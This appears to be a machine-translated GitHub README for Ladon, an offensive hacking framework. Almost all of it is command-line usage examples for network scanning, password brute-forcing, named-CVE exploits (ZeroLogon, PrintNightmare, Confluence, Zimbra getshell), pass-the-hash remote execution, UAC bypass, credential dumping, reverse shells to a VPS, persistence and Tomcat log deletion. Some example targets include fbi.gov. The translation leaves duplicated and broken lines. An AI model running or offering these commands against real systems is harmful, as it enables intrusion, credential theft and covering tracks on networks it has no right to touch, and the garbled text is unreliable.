
Ladon modular hacking framework penetration scanner & Cobalt strike, Ladon 9.3.0 has 178 built-in modules, including information collection / surviving host / port scanning / service identification / password blasting / vulnerability detection / vulnerability utilization. Vulnerability detection includes ms17010 / smbghost / Weblogic / ActiveMQ

Primary LanguageC#MIT LicenseMIT

Ladon 911 20211108

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads


Program introduction

Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning. Version 9.2.1 has 171 built-in functional modules and 18 external modules. It can quickly obtain the target network survival host IP, computer name, workgroup, shared resources, network card address, operating system version, website, subdomain name, middleware, open services, routers, databases and other information through a variety of protocols and methods. Vulnerability detection includes ms17010, smbghost, Weblogic, ActiveMQ, Tomcat, struts 2 series and so on, There are 13 kinds of password blasting including databases (mysql, Oracle, MSSQL), FTP, SSH, vnc, windows (LDAP, SMB / IPC, NBT, WMI, smbhash, wmihash, winrm), basicauth, Tomcat, Weblogic, rar, etc. the remote execution commands include (smbexec / wmiex / psexec / atexec / sshexec / jspshell), and the web fingerprint identification module can identify 75 kinds (web application, middleware, script type, page type), etc. it can be highly customized with plug-in POC support Net assembly, DLL (C # / Delphi / VC), PowerShell and other language plugins, support the batch call of any external program or command by configuring ini, and the exp generator can generate vulnerability POC at one click to quickly expand the scanning ability. Ladon supports the plug-in scanning of cobalt strike to quickly expand the intranet for horizontal movement.


New Version:https://k8gege.org/Download
All Version: https://github.com/k8gege/Ladon/releases/

Ladon concise use tutorial complete document: http://k8gege.org/Ladon Support CMD, shell, cobalt strike and PowerShell Windows version:. Net, cobalt strike, PowerShell Full system version: go (full platform), python (theoretically full platform) PS: the GUI version is mainly convenient for local testing, and CMD is used for complete functions


Ladon9.2.1 20220911

171 examples of concise usage

001 custom thread scanning

Example: scan the target 10.1.2 for ms17010 vulnerabilities

Single thread: Ladon ms17010 t = 1

80 thread: Ladon noping ms17010 t = 80

The network default thread under high-intensity protection cannot be scanned, and must be a single thread

002 Socks5 agent scan

Example: scan the target section 10.1.2 for ms17010 vulnerabilities (noping must be added)

Ladon noping MS17010

See: http://k8gege.org/Ladon/proxy.html

003 network segment scanning / batch scanning

CIDR format: not only / 24 / 16 / 8 (all)

Ladon scanning module

Ladon scanning module

Ladon scanning module

Letter format: only section C, Section B and section a are sorted in order

Ladon scanning module

Ladon scanning module

Ladon scanning module

0x004 specify IP range and network segment scanning

Ladon ICMP ICMP detects the surviving hosts of segment 1 (50-200)

Ladon ICMP ICMP probe 1.30 to 50.80 surviving hosts

Txt format

004 ICMP batch scan C-segment list survival host

Ladon ip24.txt ICMP

005 ICMP batch scan segment B list survival host

Ladon ip16.txt ICMP

006 ICMP batch scan CIDR list (e.g. IP segment of a country)

Ladon cidr. txt ICMP

007 whether ICMP bulk SCAN domain name survives

Ladon domain. txt ICMP

008 "ICMP batch scanning machine survives"

Ladon host. txt ICMP

009 whatcms batch identification URL list (CMS identification, banner, SSL certificate, title)

Ladon whatcms scan IP

Ladon whatcms scanning section C

Ladon whatcms scanning section C

Ladon whatcms scanning section B

Ladon whatcms scanning section a

Ladon IP. Txt whatcms scan IP list

Ladon ip24.txt whatcms scan C-segment list

Ladon ip16.txt whatcms scan segment B list

Ladon cidr. Txt whatcms scans the list of IP segments in the whole country

Disable Ping scanning

Ladon noping whatcms scan IP

Ladon noping whatcms scanning segment C

010 batch detection of DrayTek router version, vulnerability and weak password

Ladon url. txt DraytekPoc

011 batch decrypt Base64 password

Ladon str.txt DeBase64

Asset scanning, fingerprint identification, service identification, surviving host, port scanning

012 ICMP scans surviving hosts (fastest)

Ladon ICMP

013 Ping detect the surviving host (call the system ping command to echo MS, TTL and other information)

Ladon Ping

014 multi protocol probe surviving host (IP, machine name, MAC / domain name, manufacturer / system version)

Ladon OnlinePC

015 multi protocol identification operating system (IP, machine name, operating system version, open service)

Ladon OsScan

016 oxid probe multi network card host

Ladon EthScan

Ladon OxidScan

017 DNS detects multiple network card hosts

Ladon DnsScan

018 multi protocol scanning surviving host IP

Ladon OnlineIP

019 scan SMB vulnerability ms17010 (IP, machine name, vulnerability number, operating system version)

Ladon MS17010

020 smbghost vulnerability detection cve-2020-0796 (IP, machine name, vulnerability number, operating system version)

Ladon SMBGhost

021 scan web information / HTTP service

Ladon WebScan

022 scan C-segment site URL domain name

Ladon UrlScan

023 scan C-segment site URL domain name

Ladon SameWeb

024 scan sub domain name and secondary domain name

Ladon baidu. com SubDomain

025 domain name resolution IP, host name resolution IP

Ladon baidu. com DomainIP

Ladon baidu. com HostIP

025 batch domain name resolution IP, batch host name resolution IP

Ladon domain. txt DomainIP

Ladon host. txt HostIP

025 batch domain name and host name resolution results (only IP)

Ladon domain. txt Domain2IP

Ladon host. txt Host2IP

026 DNS query of machines and IPS in the domain (within the conditional domain)

Ladon AdiDnsDump (Domain IP)

027 query machines and IPS in the domain (within the conditional domain)

Ladon GetDomainIP

028 scan section C ports and specified ports

Ladon PortScan

Ladon PortScan 80,445,3389

029 scan C-segment web and identify CMS (86 + web fingerprint identification)

Ladon WhatCMS

030 scan Cisco devices

Ladon CiscoScan

Ladon CiscoScan

031 enumerate MSSQL database hosts (database IP, machine name, SQL version)

Ladon EnumMssql

032 enumerate network shared resources (domain, IP, host name \ shared path)

Ladon EnumShare

033 scan LDAP server (probe domain control)

Ladon LdapScan

034 scan FTP server

Ladon FtpScan

Brute force cracking / network authentication / weak password / password blasting / database / website background / login / system login

Refer to SSH for detailed explanation of password blasting: http://k8gege.org/Ladon/sshscan.html

035 port 445 SMB password blasting (Windows)

Ladon SmbScan

036 WMI password blasting on port 135 (windowns)

Ladon WmiScan

037 port 389 LDAP server, ad domain password blasting (Windows)

Ladon LdapScan

038 port 5985 winrm password blasting (Windows)

Ladon WinrmScan.ini

039 445 port SMB NTLM hash burst (Windows)

Ladon SmbHashScan

040 135 port WMI NTLM hash blasting (Windows)

Ladon WmiHashScan

041 22 port SSH password blasting (Linux)

Ladon SshScan

Ladon SshScan

042 port 1433 MSSQL database password explosion

Ladon MssqlScan

043 Oracle database password explosion on port 1521

Ladon OracleScan

Password explosion of MySQL database on port 044 3306

Ladon MysqlScan

045 Weblogic background password explosion on port 7001

Ladon WeblogicScan

Ladon WeblogicScan

046 5900 port VNC remote desktop password blasting

Ladon VncScan

047 port 21 FTP server password explosion

Ladon FtpScan

048 port 8080 Tomcat background login password explosion

Ladon TomcatScan

Ladon TomcatScan

049 web port 401 basic authentication password explosion

Ladon HttpBasicScan

050 445 port impactet SMB password blasting (Windows)

Ladon SmbScan.ini

051 445 port IPC password blasting (Windows)

Ladon IpcScan.ini

052 port 139 NetBIOS protocol windows password blasting

Ladon NbtScan

053 port 5985 winrm protocol windows password blasting

Ladon WinrmScan

054 webcam password explosion (built-in default password)

Ladon DvrScan

Vulnerability detection / POC

055 SMB vulnerability detection (cve-2017-0143 / cve-2017-0144)

Ladon MS17010

056 smbghost vulnerability detection (cve-2020-0796)

Ladon SMBGhost

057 Weblogic vulnerability detection (cve-2019-2725 / cve-2018-2894)

Ladon WeblogicPoc

058 phpstudy back door detection (phpstudy 2016 / phpstudy 2018)

Ladon PhpStudyPoc

059 ActiveMQ vulnerability detection (cve-2016-3088)

Ladon ActivemqPoc

060 Tomcat vulnerability detection (cve-2017-12615)

Ladon TomcatPoc

061 struts vulnerability detection (s2-005 / s2-009 / s2-013 / s2-016 / s2-019 / s2-032 / DevMode)

Ladon Struts2Poc

062 draytekpoc (cve-2020-8515) vulnerability detection, DrayTek version detection, weak password detection

Ladon DraytekPoc

Ladon DraytekPoc

Exploit / exploit

063 Weblogic vulnerability exploitation (cve-2019-2725)

Ladon WeblogicExp

064 Tomcat vulnerability exploitation (cve-2017-12615)

Ladon TomcatExp

065 windows 0day vulnerability generic DLL injection execution CMD generator (DLL is only 5KB)

Ladon CmdDll x86 calc

Ladon CmdDll x64 calc

Ladon CmdDll b64x86 YwBhAGwAYwA=

Ladon CmdDll b64x64 YwBhAGwAYwA=

066 (cve-2021-40444) Microsoft IE / Office 0day vulnerability

Ladon CVE-2021-40444 MakeCab poc.dll

Ladon CVE-2021-40444 MakeHtml

067 draytekexp cve-2020-8515 remote execution command exp

Ladon DraytekExp whoami

068 zerologon cve-2020-1472 domain control right (leave the password blank)

Ladon ZeroLogon dc.k8gege.org

069 cve-2020-0688 exchange serialization vulnerability (. Net 4.0)

Ladon cve-2020-0688 Administrator K8gege520

070 forexec circular vulnerability exploitation (win10 eternal black cve-2020-0796, exit successfully to avoid target blue screen)

Ladon ForExec "CVE-2020-0796-Exp -i -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

File download and file transfer

071 HTTP download HTTPS download MSF Download

Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe

Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

072 FTP download

Ladon FtpDownLoad admin admin test.exe

Encryption and decryption (hex / Base64)

073 hex encryption and decryption

Ladon 123456 EnHex

Ladon 313233343536 DeHex

074 base64 encryption and decryption

Ladon 123456 EnBase64

Ladon MTIzNDU2 DeBase64

Network sniffing

075 FTP password sniffing

Ladon FtpSniffer

076 HTTP password sniffing

Ladon HTTPSniffer

077 network sniffing

Ladon Sniffer

Password reading

078 read IIS site password and website path

Ladon IISpwd

079 read the connected WiFi password

Ladon WifiPwd

080 read FileZilla FTP password

Ladon FileZillaPwd

081 read system hash, VPN password, DPAPI key

Ladon CVE-2021-36934

082 dumplsass memory password (mimikatz clear text) only before version 9.1.1

Ladon DumpLsass

Information collection

083 obtain local intranet IP and external IP

Ladon GetIP

084 get pcname guid CPUID DiskID MAC address

Ladon GetID

085 view files recently accessed by users

Ladon Recent

086 viewing USB usage record (USB name, USB mark, path information)

Ladon UsbLog

087 detect backdoor (registry startup key, DLL hijacking)

Ladon CheckDoor

Ladon AutoRun

088 process details (program path, number of bits, startup parameters, user)

Ladon EnumProcess

Ladon Tasklist

089 get command line parameters

Ladon cmdline

Ladon cmdline cmd.exe

090 obtain basic penetration information

Ladon GetInfo

Ladon GetInfo2

091. Net & PowerShell version

Ladon NetVer

Ladon PSver

Ladon NetVersion

Ladon PSversion

092 runtime version & compilation environment

Ladon Ver

Ladon Version

093 runtime version & compilation environment & list of installed software

Ladon AllVer

Ladon AllVersion

094 view ie proxy information

Ladon QueryProxy

095 column table of contents

Ladon dirlist default column (overall)

Ladon dirlist C: \ specify the drive letter or directory

096 queryadmin view administrator user

Ladon QueryAdmin

097 view local named pipes

Ladon GetPipe

098 rdlog view 3389 connection record

Ladon RdpLog

Remote execution (psexec / wmiexec / atexec / sshexec / smbexec)

099 445 port encryption psexec remote execution command (Interactive)

net user \ k8gege520 /user:k8gege

Ladon psexec

psexec> whoami

nt authority\system

100 135 port wmiexec remote command execution (non interactive)

Ladon wmiexec k8gege k8ge520 whoamI (usage before 8.2)

Ladon wmiexec k8gege k8ge520 CMD whoamI (usage after 8.2)

Ladon wmiexec k8gege k8ge520 b64cmd d2hvyw1p (usage after 8.2)

101 445 port atexec remote execution command (non interactive)

Ladon AtExec k8gege k8gege520 whoami

102 22 port sshexec remote execution command (non interactive)

Ladon SshExec k8gege k8gege520 whoami

Ladon SshExec 22 k8gege k8gege520 whoami

103 jspshell remote execution command (non interactive)

Usage:Ladon JspShell type url pwd cmd

Example: Ladon JspShell ua Ladon whoami

104 webshell remote command execution (non interactive)
Usage:Ladon WebShell ScriptType ShellType url pwd cmd

Example: Ladon WebShell jsp ua Ladon whoami

Example: Ladon WebShell aspx cd Ladon whoami

Example: Ladon WebShell php ua Ladon whoami
105 135 port wmiexec2 remote command execution (non interactive) supports file upload


Ladon WmiExec2 host user pass cmd whoami

Ladon WmiExec2 pth host cmd whoami

Base64Cmd for Cobalt Strike

Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA

Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA


Ladon WmiExec2 host user pass upload beacon. exe ceacon.exe

Ladon WmiExec2 pth host upload beacon. exe ceacon.exe

106 445 port smbexec NTLM hash non interactive remote execution command (no echo)

Ladon SmbExec k8gege k8gege520 cmd whoami

Ladon SmbExec k8gege k8gege520 b64cmd d2hvYW1p

107 winrmexec remote execution command has no echo (system permission is supported)

Ladon WinrmExec 5985 k8gege. org Administrator K8gege520 calc.exe

Raise and lower rights

108 whoamI view current user permissions and privileges

Ladon whoami

109 6 kinds of whitelist bypassuac (after 8.0) win7-win10

Usage: Ladon bypassuac method base64cmd

Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==

110 bypassuac2 bypasses UAC execution and supports win7-win10

Ladon BypassUac2 c:\1.exe

Ladon BypassUac2 c:\1.bat

111 printnight (cve-2021-1675 | cve-2021-34527) printer vulnerability rights lifting exp

Ladon PrintNightmare c:\evil.dll

Ladon CVE-2021-1675 c:\evil.dll

112 cve-2022-21999 spoolfool printer vulnerability authorization exp

Ladon SpoolFool poc.dll

Ladon CVE-2022-21999 poc.dll

113 getsystem gives system permission to execute CMD

Ladon GetSystem cmd.exe

114 copy the token to execute CMD (e.g. system privilege reduction exploiter current user)

Ladon GetSystem cmd. exe explorer

115 runas impersonates the user to execute commands

Ladon Runas user pass cmd

116 ms16135 is authorized to system

Ladon ms16135 whoami

117 badpotato service user is authorized to system

Ladon BadPotato cmdline

118 sweetpotato service users are authorized to the system

Ladon SweetPotato cmdline

119 efspotato win7-2019 lifting rights (service user rights mention system)

Ladon EfsPotato whoami

120 open3389 one key open3389

Ladon Open3389

121 activate the built-in administrator

Ladon ActiveAdmin

122 activate the built-in user guest

Ladon ActiveGuest

Bounce shell

123 bounce TCP NC shell

Ladon ReverseTcp 4444 nc

124 bounce TCP MSF shell

Ladon ReverseTcp 4444 shell

125 bounce TCP MSF met shell

Ladon ReverseTcp 4444 meter

126 bounce HTTP MSF met shell

Ladon ReverseHttp 4444

127 bounce HTTPS MSF met shell

Ladon ReverseHttps 4444

128 bounce TCP CMD & PowerShell shell

Ladon PowerCat 4444 cmd

Ladon PowerCat 4444 psh

129 bounce UDP CMD & PowerShell shell

Ladon PowerCat 4444 cmd udp

Ladon PowerCat 4444 psh udp

130 Netsh: the 888 port of the machine is forwarded to the 22 port of 112

Ladon netsh add 888 22

131 porttran port forwarding (3389 examples)

VPS monitoring: Ladon porttran 8000 338

Target forwarding: Ladon porttran intranet IP 3389 VPS_ IP 8000

Local connection: mstsc VPS_ IP:338

Native execution

132 RDP desktop session hijacking (no password required)

Ladon RdpHijack 3

Ladon RdpHijack 3 console

133 add registry run startup key

Ladon RegAuto Test c:\123.exe

134 at plan execution program (no time required) (system permission)

Ladon at c:\123.exe

Ladon at c:\123.exe gui

135 SC service plus startup item & execution program (system authority)

Ladon sc c:\123.exe

Ladon sc c:\123.exe gui

Ladon sc c:\123.exe auto ServerName

System information detection

136 SNMP protocol detects operating system, equipment and other information

Ladon SnmpScan

137 NBT protocol detects windows host name, domain and user

Ladon NbtInfo

138 SMB protocol detection (Windows version, host name, domain)

Ladon SmbInfo

139 WMI protocol detection (Windows version, host name, domain)

Ladon WmiInfo

140 MSSQL protocol detects Windows version, host name and domain

Ladon MssqlInfo

141 winrm protocol detects Windows version, host name and domain

Ladon WinrmInfo

142 exchange probe (Windows version, host name, domain)

Ladon ExchangeInfo

143 RDP protocol detects Windows version, host name and domain

For single thread: Ladon rdpinfo f = 1

Other functions

144 win2008 one click enable net 3.5

Ladon EnableDotNet

145 get the HTML source code of intranet site

Ladon gethtml

146 one touch mini web server

Ladon web 80

Ladon web 80 dir

Get the IP of the external network (start the web on the VPS, and the target access is ip.txt or ip.jpg)

147 getstr / getb64 / debase64 (echo result without echo vulnerability)

Monitoring Ladon web 800

Submit return clear text

certutil. exe -urlcache -split -f

Base64 encryption result

certutil. exe -urlcache -split -f

Base64 result decryption

certutil. exe -urlcache -split - fhttp://

148 Shiro plug-in detection

Ladon IsShiro

149 logdeltomcat delete Tomcat specified IP log

Ladon LogDelTomcat access. log

150 C # custom assembly plug-in scan

Ladon Poc.exe

Ladon *.dll(c#)

151 readfile reads the content of the specified length in front of a large file

Ladon readfile C: \ k8.exe (default 1K)

Ladon ReadFile c:\k8.exe 1K

Ladon ReadFile c:\k8.exe 1024K

Ladon ReadFile c:\k8.exe 1M

152 modify the registry and read the clear text password of the system after 2012

Ladon SetMzLogonPwd 1

153 modify registry, hijack signature and visa

Ladon SetSignAuth 1

154 ip24 batch IP to ip24 format (

Ladon ip. txt IP24

155 IPC batch IP to IP C format (192.168.1.)

Ladon ip. txt IPC

156 IPB batch IP to IP B format (192.168.)

Ladon ip. txt IPB

157 batch inspection atlas conflict cve-2022-26134

Ladon url. txt CVE-2022-26134

158 Atlassian Confluence CVE-2022-26134 EXP

Ladon EXP-2022-26134 id

159 revshell-2022-26134 cve-2022-26134 rebound shell

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort

Ladon RevShell-2022-26134 http://xxx.com:8090 4444

160 ssslinfo certificate: detect equipment, IP, domain name, machine name, organization and other information

Ladon https://k8gege.org SslInfo

Ladon k8gege. org SslInfo

Ladon k8gege. Org: 443 sslenfo specifies the port

Ladon noping fbi. Gov ssslinfo forbids Ping detection

Ladon SslInfo

Ladon SslInfo

161 ssslinfo certificate: batch detection of equipment, IP, domain name, machine name, organization and other information

Ladon ip. txt SslInfo

Ladon url. txt SslInfo

Ladon SslInfo

Ladon SslInfo

162 wpinfo many ways to get WordPress main program, theme and plug-in version

Ladon https://k8gege.org WPinfo

Ladon k8gege. org WPinfo

Ladon noping fbi. Gov wpinfo disable Ping detection

Ladon WPinfo

Ladon WPinfo

163 wpinfo get WordPress main program, theme and plug-in version in batches

Ladon ip. txt WPinfo

Ladon url. txt WPinfo

Ladon WPinfo

Ladon WPinfo

164 exchange brute force cracking identifies exchange password blasting

Ladon k8gege. org ExchangeScan

Ladon ExchangeScan

Ladon、24 ExchangeScan

165 (cve-2022-27925) batch probe of Zimbra postal service zip directory through rce vulnerability

Ladon CVE-2022-27925

Ladon http://zimbra.k8gege.org CVE-2022-27925

Ladon ip. txt CVE-2022-27925

Ladon url. txt CVE-2022-27925

Ladon CVE-2022-27925

Ladon CVE-2022-27925

166 exp-2022-27925 Zimbra mail server unauthorized rce vulnerability exp getshell

Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip

167 webshell CMD connects JSP webshell (supports CD, K8, UA, uab64)

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

168 webshell CMD connects JSP webshell (supports CD, K8, UA, uab64)

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

169 non interactive connection IIS raid backdoor execute command

Ladon IISdoor whoami

Ladon IISdoor SIMPLEPASS whoami

170 whether findip matching IP segments appear in the vulnerability results

Ladon FindIP ipc. txt ISVUL.txt

171 CiscoDump CVE-2019-1653 Cisco RV320 RV325 Dump Password

Ladon CiscoDump

Ladon url. Txt Cisco dump bulk detect Cisco vulnerabilities and export user passwords



Latest version

Latest version in small seal ring: http://k8gege.org/Ladon/update.txt

Stargazers over time

Stargazers over time